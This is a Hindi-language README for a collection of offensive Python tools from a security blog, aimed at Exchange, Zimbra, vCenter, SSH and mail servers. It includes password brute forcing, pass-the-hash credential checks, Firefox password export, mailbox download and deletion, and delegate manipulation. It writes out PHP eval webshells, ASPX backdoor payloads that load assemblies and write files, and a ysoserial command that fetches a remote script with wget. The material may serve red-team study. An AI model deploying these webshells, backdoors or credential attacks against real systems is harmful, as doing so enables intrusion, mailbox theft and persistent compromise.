
Python codes of my blog.
मेरे ब्लॉग के Python कोड।
PPTP VPN का पासवर्ड पाने के लिए ब्रूट-फोर्स हमले का उपयोग करें।
यह फ़ाइल (wordlist नामक) में पासवर्ड पढ़ेगा और फिर सर्वर से कनेक्ट करने के लिए pptpsetup का उपयोग करेगा।
समय अंतराल 10 सेकंड है।
पोर्ट स्कैन करने के लिए उपयोग करें।
टाइमआउट 3 सेकंड है।
c++ संस्करण:
https://github.com/3gstudent/Homework-of-C-Language/blob/master/portscan.cpp
URL से IP प्राप्त करने के लिए उपयोग करें।
मैं Sublist3r के परिणाम को सीधे उपयोग कर सकता हूँ।
Sublist3r के परिणाम से डुप्लिकेट IP हटाने के लिए उपयोग करें।
मैं urltoip.py के परिणाम को सीधे उपयोग कर सकता हूँ।
Sublime(F9) का उपयोग करके IP को क्रमबद्ध किया जा सकता है।
फ़ाइल से डुप्लिकेट आइटम हटाने के लिए उपयोग करें।
संदर्भ:
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
fofa का API कॉल करने और परिणामों से IP प्रिंट करने के लिए उपयोग किया जाता है।
आप 100 परिणाम प्राप्त कर सकते हैं।
fofa का API कॉल करने और परिणामों से IP प्रिंट करने के लिए उपयोग किया जाता है।
यदि आप VIP हैं, तो आपको 10000 परिणाम मिलेंगे।
संदर्भ:
https://seclists.org/fulldisclosure/2019/Sep/31
उदा.
echo \<?php @eval\(\$_POST[pwd]\)\;?\> >test.php
संदर्भ:
https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w
उदा.
system('cmd /c "echo ^<?php @eval(^$_POST[pwd]);?^> >D:\phpstudy\WWW\test.php"');
Firefox का पासवर्ड निर्यात करने के लिए उपयोग करें
Exchange का संस्करण प्राप्त करने के लिए उपयोग करें।
पहले URL के सोर्स कोड से BuildNumber प्राप्त करें और फिर संस्करण प्राप्त करें।
संदर्भ:
SMBv3 RCE भेद्यता को स्कैन करने के लिए उपयोग करें।
टाइमआउट 3 सेकंड है।
संदर्भ:
https://github.com/imjdl/CVE-2020-8515-PoC
CVE-2020-8515
DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, तथा Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, और 1.4.4_Beta डिवाइस cgi-bin/mainfunction.cgi URI.. पर shell मेटाकैरेक्टर के माध्यम से बिना प्रमाणीकरण के रूट के रूप में रिमोट कोड निष्पादन की अनुमति देते हैं।
प्रभावित उत्पाद:
Zimbra मेल सर्वर से कनेक्ट करने के लिए Zimbra SOAP API का उपयोग करें।
उपयोग:
Zimbra_SOAP_API.py <url> <username> <password> <mode>
मोड:
उदा:
Zimbra_SOAP_API.py https://192.168.1.1 [email protected] password low
Exchange Web Service के वैध खाते की जाँच करने के लिए उपयोग करें (plaintext और ntlmhash समर्थन)
संदर्भ:https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py
उपयोग:
checkEWS.py <host> <port> <mode> <domain> <user> <password>
<mode>:
- plaintext
- ntlmhash
उदा.
checkEWS.py 192.168.1.1 443 plaintext test.com user1 password1
checkEWS.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1
Autodiscover.xml तक पहुँचने और उपयोगकर्ता की कॉन्फ़िगरेशन प्राप्त करने के लिए उपयोग करें (plaintext और ntlmhash समर्थन)
उपयोग:
checkAutodiscover.py <host> <port> <mode> <email> <password> <command>
<command>:
- checkautodiscover
- getusersetting
- checkoab
- downloadlzx
उदा.
checkAutodiscover.py 192.168.1.1 443 plaintext [email protected] password1 checkaut
odiscover
checkAutodiscover.py test.com 80 ntlmhash [email protected] c5a237b7e9d8e708d8436b6
148a25fa1 getusersetting
checkAutodiscover.py का अतिरिक्त मोड
पैरामीटर जोड़ें
Exchange Web Service तक पहुँचने के लिए उपयोग करें (plaintext और ntlmhash समर्थन)
उपयोग:
ewsManage.py <host> <port> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
<command>:
- getfolderofinbox
- getfolderofsentitems
- listmailofinbox
- listmailofsentitems
- listmailoffolder
- getmail
- deletemail
- deletefolder
- getattachment
- saveattachment
- getdelegateofinbox
- adddelegateofinbox
- updatedelegateofinbox
- removedelegateofinbox
- getdelegateofinbox2
- updatedelegateofinbox2
- restoredelegateofinbox2
- getinboxrules
- updateinboxrules
- removeinboxrules
- deleteattachment
- createattachment
- createfolderofinbox
- listhiddenfolderofinbox
- createtestmail
- SetHiddenPropertyType
- UpdateHiddenPropertyType
- getcontact
- findpeople
- findallpeople
- resolvename
- resolveallname
उदा.
ewsManage.py 192.168.1.1 443 plaintext test.com user1 password1 getfolderofinbox
ewsManage.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 listmailofinbox
SSH की वैध क्रेडेंशियल जाँचने के लिए उपयोग करें (पासवर्ड और privatekeyfile समर्थन)
उपयोग:
sshCheck.py <host> <port> <mode><user> <password>
<mode>:
- plaintext
- keyfile
उदा.
sshCheck.py 192.168.1.1 22 plaintext root toor
sshCheck.py 192.168.1.1 22 keyfile root id_rsa
SSH के माध्यम से रिमोट कमांड निष्पादन (पासवर्ड और privatekeyfile समर्थन)
उपयोग:
sshRunCmd.py <host> <port> <mode><user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell
उदा.
sshRunCmd.py 192.168.1.1 22 plaintext root toor shell
sshRunCmd.py 192.168.1.1 22 keyfile root id_rsa ps
eas (Exchange Server ActiveSync) की वैध क्रेडेंशियल जाँचने के लिए उपयोग करें
उपयोग:
easCheck.py <host> <user> <password>
उदा.
easCheck.py 192.168.1.1 user1 password1
OWA से कनेक्ट करके Exchange के वैध खाते की जाँच करने के लिए उपयोग करें।
उपयोग:
checkOWA.py <url> <user> <password>
OWA से कनेक्ट करके मेल पढ़ने के लिए उपयोग करें।
उपयोग:
owaManage.py <url> <user> <password> <command>
<command>
- ListFolder
- ViewMail
- DownloadAttachment
मेल सर्वर से कनेक्ट करने के लिए IMAP का उपयोग करें।
उपयोग:
imapManage.py <IMAP server> <username> <password> <command>
<command>:
CheckConfig get the folder name
SaveAttachOfInbox save the attachments of Inbox
SaveAttachOfSent save the attachments of Sent
DownloadAllMailOfInbox download all the mails of Inbox
DownloadAllMailOfSent download all the mails of Sent
Eg:
imapManage.py 192.168.1.1 user1 password CheckConfig
execCmd.aspx के साथ NTLM प्रमाणीकरण लागू करने और संचार करने के लिए उपयोग करें
संचार डेटा Base64 के साथ एन्कोड किया जाता है
उपयोग:
aspxCmdNTLM.py <host> <port> <url> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
Eg.
aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/1.txt plaintext test.com user
1 password1 whoami
aspxCmdNTLM.py test.com 80 http://192.168.1.1/1.aspx ntlmhash test.com user1 c5a
237b7e9d8e708d8436b6148a25fa1 whoami
C sharp संस्करण: SharpExchangeBackdoor.cs
Exchange वेबशेल बैकडोर पर पेलोड भेजने के लिए उपयोग करें।
समर्थन:
उपयोग:
<url> <user> <password> <mode> <path>
mode:
assemblyLoad
webshellWrite
उदा.
SharpExchangeBackdoor.py https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll
SharpExchangeBackdoor.py https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx
assemblyLoad.aspx:
<%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%>
webshellWrite.aspx:
<%@ Page Language="C#" %><%if (Request.Files.Count!=0)Request.Files[0].SaveAs(Server.MapPath("./uploadDemo.aspx"));}%>
असुरक्षित ऑब्जेक्ट डिसीरियलाइज़ेशन - IMAP
उपयोग:
<url> <user> <password> <payload path>
उदा.
https://192.168.1.1 [email protected] password1 payload.obj
नोट:
आप payload.obj इस प्रकार बना सकते हैं:
java -jar ysoserial.jar MozillaRhino2 "/usr/bin/wget https://192.168.1.1/test.sh --no-check-certificate -O /tmp/test.sh" > payload.obj
Exchange के डिसीरियलाइज़िंग कोड निष्पादन का परीक्षण करने के लिए उपयोग करें।
Exchange फ़ाइलों की पढ़ने और लिखने की अनुमतियों से लेकर डिसीरियलाइज़िंग कोड निष्पादन तक।
डिसीरियलाइज़िंग कोड निष्पादन लागू करने के लिए आपको %ExchangeInstallPath%\FrontEnd\HttpProxy\\web.config में machineKey संशोधित करना चाहिए।
<path>:owa या ecp
उपयोग:
<url> <key> <path>
उदा.
192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa
mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp
Exchange SOAP XML संदेश पार्स करने के लिए उपयोग करें।
Exchange एडमिन सेंटर तक पहुँचने के लिए उपयोग करें
उपयोग:
eacManage.py <url> <user> <password> <command>
<command>:
- ListAdminRoles
- NewAdminRoles
- EditAdminRoles
- DeleteAdminRoles
- AddMailbox
- RemoveMailbox
- ExportAllMailbox
- GetCertificate
- ExportCertificate
VM प्रबंधित करने के लिए vSphere Automation API(v7.0U1+) का उपयोग करें
Windows और Linux VM समर्थन
VM प्रबंधित करने के लिए vSphere Web Services API का उपयोग करें
संदर्भ: https://github.com/vmware/pyvmomi/
स्थापना: pip install --upgrade pyvmomi
vCenter पर LDAP डेटाबेस प्रबंधित करने के लिए उपयोग करें।
SolarWinds Orion प्लेटफ़ॉर्म प्रबंधित करने के लिए उपयोग करें
Orion प्लेटफ़ॉर्म प्रबंधित करने के लिए SolarWinds Orion API का उपयोग करें
MailEnable मेल सर्वर प्रबंधित करने के लिए उपयोग करें
यह HTTP या FTP प्रोटोकॉल के माध्यम से परिणाम प्राप्त करने का समर्थन करता है।
Exchange Web Service तक पहुँचने के लिए उपयोग करें (plaintext और ntlmhash समर्थन)
Exchange Web Service तक पहुँचने के लिए उपयोग करें (plaintext और ntlmhash समर्थन)
Exchange Web Service तक पहुँचने के लिए requests_ntlm2 का उपयोग करें (plaintext और ntlmhash समर्थन)
Exchange Web Service तक पहुँचने के लिए requests_ntlm2 का उपयोग करें (plaintext और ntlmhash समर्थन)
संचार डेटा कम करने के लिए session का उपयोग करें
https://github.com/horizon3ai/vcenter_saml_login से संशोधित
https://github.com/horizon3ai/vcenter_saml_login से संशोधित
Exchange का संस्करण प्राप्त करने और मौजूदा भेद्यताओं से मिलान करने के लिए उपयोग करें
Exchange का संस्करण प्राप्त करने और https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 से संस्करण पार्स करने के लिए उपयोग करें
आपको https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 को exchange.data के रूप में सहेजना चाहिए
Exchange का संस्करण प्राप्त करने और https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 से संस्करण पार्स करने के लिए उपयोग करें
Exchange का आंतरिक IP प्राप्त करने के लिए उपयोग करें
msf auxiliary/scanner/http/owa_iis_internal_ip पर आधारित, लेकिन अधिक Exchange सर्वरों का समर्थन करता है।
vRealize Operations Manager का संस्करण प्राप्त करने के लिए उपयोग करें
कमांड चलाने के लिए bash का उपयोग करें
Sophos UTM की .plx फ़ाइल डिक्रिप्ट करने के लिए उपयोग करें
संदर्भ:
https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
https://github.com/the6p4c/bfs_extract
Sophos UTM की कॉन्फ़िगरेशन पार्स करने के लिए उपयोग करें